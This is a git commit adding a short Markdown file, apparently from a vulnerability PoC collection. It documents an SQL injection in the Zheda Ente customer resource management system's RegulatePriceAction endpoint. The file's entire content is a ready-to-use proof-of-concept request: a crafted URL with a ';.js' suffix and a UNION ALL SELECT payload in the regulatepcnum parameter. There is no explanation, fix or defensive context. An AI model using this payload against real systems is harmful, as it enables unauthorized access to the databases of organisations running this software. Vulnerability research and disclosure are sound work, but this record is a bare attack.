Create 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md

2024-04-07 18:31:01 +08:00 · 2024-04-07 18:31:01 +08:00 · f31be51fa5
commit f31be51fa5
parent a24fa95300
1 changed files with 7 additions and 0 deletions
--- a/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md
+++ b/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md
@ -0,0 +1,7 @@
+## 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入
+
+## poc
+```
+/entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist&regulatepcnum=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,111*111--+aaaa
+
+```